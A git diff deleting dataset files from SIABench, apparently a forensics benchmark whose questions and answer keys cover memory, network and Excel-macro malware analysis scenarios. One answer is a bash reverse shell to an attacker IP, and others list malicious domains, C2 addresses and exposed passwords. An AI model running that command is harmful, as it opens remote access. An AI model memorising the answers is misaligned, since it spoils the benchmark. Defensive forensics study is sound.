"P59fS93m", - "adversarial_tactic": "Credential Access: Stored passwords used to establish unauthorized access fall under Credential Access, where attackers aim to collect or use stolen credentials." - }, - { - "question": "5. Within the 'ecorpoffice/win7ecorpoffice.vmem' memory dump, can you find any email addresses associated with any phishing activity. If so, what is the sender's email address linked to this activity?", - "answer": "karenmiles@t-online.de", - "adversarial_tactic": "Initial Access: The email address of the phishing email sender provides insight into the Initial Access tactic, where email phishing is used to establish a foothold in the network." - }, - { - "question": "6. Within the 'ecorpoffice/win7ecorpoffice.vmem', can you identify any suspicious document? If so, what is the MD5 hash of a suspicious document found in the memory dump?", - "answer": "c2dbf24a0dc7276a71dd0824647535c9", - "adversarial_tactic": "Initial Access: A malicious document used in a phishing campaign aligns with Initial Access, where malicious files exploit vulnerabilities to gain initial access." - }, - { - "question": "7. Within the 'ecorpoffice/win7ecorpoffice.vmem', can you identify if any ransomware was demanded through a cryptocurrency wallet? If so, what is the wallet address associated with this incident?", - "answer": "25UMDkGKBe484WSj5Qd8DhK6xkMUzQFydY", - "adversarial_tactic": "Impact: The presence of a cryptocurrency wallet linked to ransom demands relates to Impact, where ransomware or extortion attacks cause operational or financial disruption." - }, - { - "question": "8. In the 'ecorpoffice/win7ecorpoffice.vmem' file, can you locate if any system identifier was given by the suspicious file for remote access activities. If so, what identifier is associated with this activity?", - "answer": "528 812 561", - "adversarial_tactic": "Persistence: The system identifier for remote access likely provides the attacker with Persistence, enabling repeated access to the compromised system." - }, - { - "question": "9. Within the 'ecorpoffice/win7ecorpoffice.vmem', can you identify any signs of recent external connections through remote access tool? If so, what IP address is associated with the latest remote access connection?", - "answer": "31.6.13.155", - "adversarial_tactic": "Command and Control: Identifying IPs associated with remote connections indicates Command and Control (C2) tactics, where attackers establish channels to control compromised systems." - }, - { - "question": "10. Within the memory dump 'ecorpoffice/win7ecorpoffice.vmem', analyze scripts or functions embedded in a suspicious document. What function name appears to return the command string executed on the system?", - "answer": "UsoJar", - "adversarial_tactic": "Execution: This question targets script-based Execution tactics, where embedded commands execute malicious actions within the compromised environment." - }, - { - "question": "11. In the memory dump 'ecorpwin7/win7.vmem', can you identify if there is any document seems to be suspicious? If so, what is the name of the suspicious document?", - "answer": "Important_ECORP_Lawsuit_Washington_Leak.rtf", - "adversarial_tactic": "Initial Access: Malicious documents associated with compromise entry points fit Initial Access tactics, where attackers often use documents to establish a foothold." - }, - { - "question": "12. Within the 'ecorpwin7/win7.vmem', can you identify is there any password used for compressing files related to exfiltration? If so, what is the password used for this purpose?", - "answer": "password1234", - "adversarial_tactic": "Exfiltration: The password for compressed files used in data exfiltration aligns with Exfiltration tactics, where data is covertly transferred from the environment." - }, - { - "question": "13. In the memory dump 'ecorpwin7/win7.vmem', can you identify if there is any indicator of a command-and-control (C2) server? If so, what is the IP address associated with this C2 server?", - "answer": "52.90.110.169", - "adversarial_tactic": "Command and Control: External C2 server connections are central to Command and Control (C2) tactics, where attackers remotely manage and execute commands on infected machines." - }, - { - "question": "14. Within the 'ecorpwin7/win7.vmem', can you find any email addresses associated with any phishing activity. If so, what is the sender's email address linked to this activity?", - "answer": "lloydchung@allsafecybersec.com", - "adversarial_tactic": "Initial Access: Email addresses associated with phishing attempts to gain access indicate Initial Access through social engineering and email-based attack vectors." - }, - { - "question": "15. Search 'ecorpwin7/win7.vmem', can you identify if there is any package that the attacker staged to infect the E Coin Servers? If so, what is the name of the package?", - "answer": "linuxav.deb", - "adversarial_tactic": "Impact: Malicious packages on E Coin Servers relate to Impact tactics, where attackers disrupt operations or services through malware installation." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/thmprofile.json b/SIABench-main/SIA_Dataset/thmprofile.json deleted file mode 100644 index 33d0fd37dd2648d7caa8870db10fa10b702adda4..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/thmprofile.json +++ /dev/null @@ -1,79 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://tryhackme.com/r/room/profilesroom", - "scenario_name": "THM_Profile", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@lukwagoasuman236/tryhackme-profiles-write-up-60202db52210" - } - }, - { - "sia_components": { - "scenario": "The incident response team has notified you of unusual behavior on a Linux-based database server. A memory dump was captured from the system and handed over for examination. The team is unsure about the exact nature of the issue, and your task is to analyze the dump to detect any signs of compromise or malicious activity.", - "task_category": "Memory Forensics", - "complexity": "Medium", - "tools_available": [ - "Volatility (2.6.1)", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "uniq", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois" - ], - "files_available": "linux.mem", - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed).(Extra info: The profile for win7ecorpoffice memory dump is 'Linuxubuntu20_04x64'.)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. From the memory dump, can you identify if any user credentials are exposed. If so, what is the exposed password?", - "answer": "Ftrccw45PHyq", - "adversarial_tactic": "Credential Access: Exposed credentials can be used by attackers to gain unauthorized access to systems." - }, - { - "question": "2. Can you identify if any database file was accessed? If so, what is the timestamp of the access?", - "answer": "2023-11-07 03:49:45", - "adversarial_tactic": "Credential Access: Access to critical database files could signal an attempt to extract user information." - }, - { - "question": "3. Can you identify if there are any files that seems to be suspicious? If so, what is the md5 hash of the file?", - "answer": "0511ccaad402d6d13ce801e1e9136ba2", - "adversarial_tactic": "Execution: For identifying files potentially used to execute malicious processes." - }, - { - "question": "4. Can you identify any network-related activity related to any potential malicious actor? If so, what is the IP address and port number of the malicious actor?", - "answer": "10.0.2.72:1337", - "adversarial_tactic": "Command and Control: Identifying network connections to malicious IP addresses can help identify command-and-control servers used by attackers to control compromised systems." - }, - { - "question": "5. Can you identify if there is any evidence of scheduled tasks or cron jobs in the memory dump? If so, what is the full path of the cron job file and its inode number?", - "answer": "The full path of the cronjob file is /var/spool/cron/crontabs/root and its inode number is 131127", - "adversarial_tactic": "Persistence: Cron jobs can be used by attackers to ensure their malicious code runs at regular intervals, maintaining persistence." - }, - { - "question": "6. If there is any evidence of cron jobs, can you identify the contents of the cron job file? If so, what command is being executed by the cron job?", - "answer": "* * * * * cp /opt/.bashrc/root/.bashrc", - "adversarial_tactic": "Persistence: The cron job may be designed to ensure continuous execution of malicious commands or scripts." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/tomcat.json b/SIABench-main/SIA_Dataset/tomcat.json deleted file mode 100644 index f4b244a78730953d7e125e53148b30be326c4b57..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/tomcat.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/tomcat-takeover/", - "scenario_name": "Tomcat", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/Tomcat%20Takeover" - } - }, - { - "sia_components": { - "scenario": "Suspicious behavior was detected by the SOC team on a web server operating inside the company’s intranet. To investigate further, they collected network traffic for detailed examination. The captured PCAP file could hold clues pointing to malicious actions that resulted in the compromise of the Apache Tomcat server. Your objective is to analyze the PCAP data and determine the extent of the attack.", - "task_category": "Network Forensics", - "complexity": "Easy", - "tools_available": [ - "tshark", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "uniq", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "capture.pcap", - "directory": "(directory_of_the_files)", - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, if needed)", - "questions": [ - { - "question": "1. Using the network traffic, can you identify if there is any source IP address exhibiting scanning behavior. If so, what is the IP address?", - "answer": "14.0.0.120", - "adversarial_tactic": "Reconnaissance : This activity involves identifying the source of the scanning or enumeration behavior in the captured network traffic." - }, - { - "question": "2. Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker's activities originated?", - "answer": "Guangzhou", - "adversarial_tactic": "Reconnaissance: IP attribution helps in understanding the attack source from which the reconnaissance activities are originating." - }, - { - "question": "3. Can you identify if there were any ports detected as open on the target server during the attack? If so, which of the ports provide access to the web server admin panel?", - "answer": "8080", - "adversarial_tactic": "Reconnaissance: Identifying open ports helps attackers find potential entry points." - }, - { - "question": "4. Can you identify if the attacker attempted to enumerate directories and files on the web server? If so, which tool/tools were used for this purpose?", - "answer": "Gobuster", - "adversarial_tactic": "Discovery: Enumeration helps attackers map server structure." - }, - { - "question": "5. Subsequent to directory enumeration, can you identify if the attacker attempted to identify administrative interfaces? If so, which directory was the attacker was able to uncover?", - "answer": "/manager", - "adversarial_tactic": "Discovery: Enumeration helps attackers map server structure." - }, - { - "question": "6. Subsequent to accessing the administrative interface, can you identify if the attacker attempted to authenticate to the web server? If so, what credentials were used?", - "answer": "admin:tomcat", - "adversarial_tactic": "Initial Access: Default or weak credentials can provide initial access to systems." - }, - { - "question": "7. Following successful authentication, can you identify if the attacker uploaded any files to the web server? If so, what was the name of the uploaded file?", - "answer": "JXQOZY.war", - "adversarial_tactic": "Execution: File uploads can deliver malicious payloads to the server." - }, - { - "question": "8. Can you identify if the attacker attempted to establish persistence on the compromised server? If so, what persistence mechanisms were employed?", - "answer": "/bin/bash -c bash -i >& /dev/tcp/14.0.0.120/443 0>&1", - "adversarial_tactic": "Persistence: Attackers use persistence mechanisms to maintain access to compromised systems." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/ulysses.json b/SIABench-main/SIA_Dataset/ulysses.json deleted file mode 100644 index 771eabef63b30f7545f7b2bc366bb0b9743e686f..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/ulysses.json +++ /dev/null @@ -1,103 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/ulysses/", - "scenario_name": "Ulysses", - "last_accessed": "June 04, 2025", - "writeup": "https://forensicskween.com/ctf/cyberdefenders/ulysses/" - } - }, - { - "sia_components": { - "scenario": "A research server triggered alerts due to unusual behavior following numerous failed login attempts. Analysts confirmed signs of a brute-force attack, suspicious outbound traffic, and potential persistence techniques. Hard disk dumps and memory snapshots of the machine are provided in order to solve the challenge.", - "task_category": "Memory Forensics", - "complexity": "Medium", - "files_available": [ - "sample.sda1.img", - "sample.kcore.img", - "sample.memdump.img" - ], - "tools_available": [ - "Volatility (2.6.1)", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois" - ], - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed). (Extra info: The profile for win7ecorpoffice memory dump is 'LinuxDebian5_26x86'. and The sample.sda1.img is mounted to (path) directory.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. What operating system is running on the server?", - "answer": "Debian GNU/Linux 5.0", - "adversarial_tactic": "" - }, - { - "question": "2. What is the ip address of the server?", - "answer": "192.168.56.102", - "adversarial_tactic": "" - }, - { - "question": "3. Can you verify if there are any suspicious authentication attempts? If so, what user account shows signs of suspicious activity?", - "answer": "ulysses", - "adversarial_tactic": "Credential Access: Monitoring failed login attempts may indicate password guessing or brute-forcing attacks targeting specific accounts." - }, - { - "question": "4. If there are suspicious authentication attempts, how many failed login attempts are recorded for the suspicious activity? ", - "answer": "32", - "adversarial_tactic": "Credential Access: Monitoring failed login attempts may indicate password guessing or brute-forcing attacks targeting specific accounts." - }, - { - "question": "5. Can you identify if there are any IP addresses that have been interacting with the server recently and that seems to be suspicious?", - "answer": "192.168.56.1, 192.168.56.101", - "adversarial_tactic": "Command and Control: Identifying suspicious IP addresses can help trace potential Command and Control (C2) servers or attacker-controlled systems." - }, - { - "question": "6. Can you identify if there are any active network communication processes running on the system that might be suspicious? If so, what is the name of the service and its process ID?", - "answer": "nc service with PID 2169", - "adversarial_tactic": "Command and Control: Active network communication processes can indicate Command and Control (C2) activity, where attackers maintain control over compromised systems." - }, - { - "question": "7. Can you identify if there are any services that might have been exploited to gain access to the system? If so, what is the name of the service?", - "answer": "Exim4", - "adversarial_tactic": "Initial Access: Exploiting services is a common Initial Access tactic, where attackers leverage vulnerabilities to gain a foothold in the target system." - }, - { - "question": "8. Can you identify if any new file been downloaded or created on the server recently? If so, what is the name of the file?", - "answer": "rk.tar", - "adversarial_tactic": "Execution: Downloading files is a common tactic for delivering payloads or additional tools to the target system." - }, - { - "question": "9. Can you identify if there were any ports involved in network traffic that seem associated with data exfiltration? If so, what is the port number of the highest one? ", - "answer": "8888", - "adversarial_tactic": "Exfiltration: Identifying ports associated with data exfiltration can help trace the methods attackers use to steal data from the target system." - }, - { - "question": "10. Can you identify, if there has been any attempt to modify firewall settings? If so, find if any port was blocked or manipulated.", - "answer": "45295", - "adversarial_tactic": "Defense Evasion: Modifying firewall settings is a Defense Evasion tactic, where attackers attempt to bypass security controls to maintain access or exfiltrate data." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/xlm_macro.json b/SIABench-main/SIA_Dataset/xlm_macro.json deleted file mode 100644 index 5d496c6aaae34a2fd6b64754d586659540b2563e..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/xlm_macro.json +++ /dev/null @@ -1,115 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/xlm-macros/", - "scenario_name": "XLM_Macro", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/XLM_Macros" - } - }, - { - "sia_components": { - "scenario": "This task aims to place you in the role of a blue team security analyst, where you'll analyze two documents leveraging Excel 4.0 macros designed to evade analysis and download the next stage of the attack.", - "task_category": "Malware Analysis", - "complexity": "Medium", - "files_available": [ - "sample1.bin", - "sample2.bin" - ], - "tools_available": [ - "oledump", - "olevba", - "xlmdeobfuscator", - "msoffcrypto-tool", - "msoffcrypto-crack.py", - "plugin_biff.py", - "grep", - "find", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python" - ], - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, oledump, olevba, xlmdeobfuscator, msoffcrypto-tool, msoffcrypto-crack, plugin_biff.py if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. From sample1.bin, can you identify if there is any protection mechanism applied to the document? If so, what is the password used to protect the document?", - "answer": "VelvetSweatshop", - "adversarial_tactic": "Defense Evasion: Attackers often use password protection to evade detection and complicate analysis by restricting access to document contents." - }, - { - "question": "2. From sample1.bin, can you identify any hidden sheets in sample1.bin? If so, what is the name of the sheet that starts with the letter 'S'?", - "answer": "SOCWNEScLLxkLhtJp", - "adversarial_tactic": "Defense Evasion: Hidden sheets and workbook elements conceal malicious code or indicators, helping evade security tools and analysts." - }, - { - "question": "3. From sample1.bin, can you identify any URLs embedded within the document used for downloading the next stage of the attack? If so, what is the domain name used for communication?", - "answer": "rilaer.com", - "adversarial_tactic": "Command and Control: URLs for secondary payloads are often embedded for command and control communication, enabling attackers to download additional components." - }, - { - "question": "4. From sample1.bin, can you identify any file that appears to be downloaded or referenced as suspicious executables? If so, what is the name of the file? ", - "answer": "ixcxmzcvqui.exe", - "adversarial_tactic": "Execution: Executable references in macros indicate potential malware that will be executed upon download, contributing to the Execution tactic." - }, - { - "question": "5. From sample2.bin, can you identify if there are any hidden sheets in the document? If so, what is the name of the sheet?", - "answer": "CSHykdYHvi", - "adversarial_tactic": "Defense Evasion: Very hidden sheets help attackers obfuscate malicious content and evade automated analysis." - }, - { - "question": "6. From sample2.bin, can you identify any instances of registry command usage, particularly noting any registry key accessed by the document? If so, what registry key is it checking?", - "answer": "VBAWarnings", - "adversarial_tactic": "Persistence: Modifying registry keys related to security can either evade defenses or persistently disable protection mechanisms." - }, - { - "question": "7. From sample2.bin, can you identify any registry checks performed? If so, what is the value being accessed indicating a virtual or sandboxed environment?", - "answer": "0x1", - "adversarial_tactic": "Defense Evasion: Anti-virtualization checks help malware detect and evade analysis environments, allowing it to remain undetected during analysis." - }, - { - "question": "8. In sample2.bin, can you identify any specific macro functions employed for anti-analysis? If so, what is the function used?", - "answer": "GET.WORKSPACE", - "adversarial_tactic": "Defense Evasion: Anti-analysis functions retrieve system information that helps malware determine if its in an analysis environment, facilitating evasion." - }, - { - "question": "9. In sample2.bin, can you identify any if there are any environment checks performed? If so, what is the value being used to compare the environment?", - "answer": "Windows", - "adversarial_tactic": "Defense Evasion: Environment checks enable the malware to evade detection by distinguishing between analysis and target environments." - }, - { - "question": "10. In sample2.bin, can you identify if there are any payloads downloaded? If so, what is the type of payload being downloaded?", - "answer": "DLL", - "adversarial_tactic": "Execution: Downloaded payloads are often executed to deliver malicious functionality, contributing to the Execution tactic." - }, - { - "question": "11. In sample2.bin, can you identify any URLs or domains linked to the payload download? If so, what is the URL or domain?", - "answer": "ethelenecrace.xyz", - "adversarial_tactic": "Command and Control: Environment checks enable the malware to evade detection by distinguishing between analysis and target environments." - }, - { - "question": "12. In sample2.bin, can you identify the filenames used for saving downloaded payloads? If so, what is the filename?", - "answer": "bmjn5ef.html", - "adversarial_tactic": "Execution: Filenames of downloaded payloads indicate potential malware components that are saved and executed." - }, - { - "question": "13. In sample2.bin, can you identify any processes or executables invoked to execute payload? If so, what is the executable name?", - "answer": "rundll32.exe", - "adversarial_tactic": "Execution: Executable invocation for malware execution falls under the Execution tactic as it runs malicious code." - } - ] - } - } - ] -} \ No newline at end of file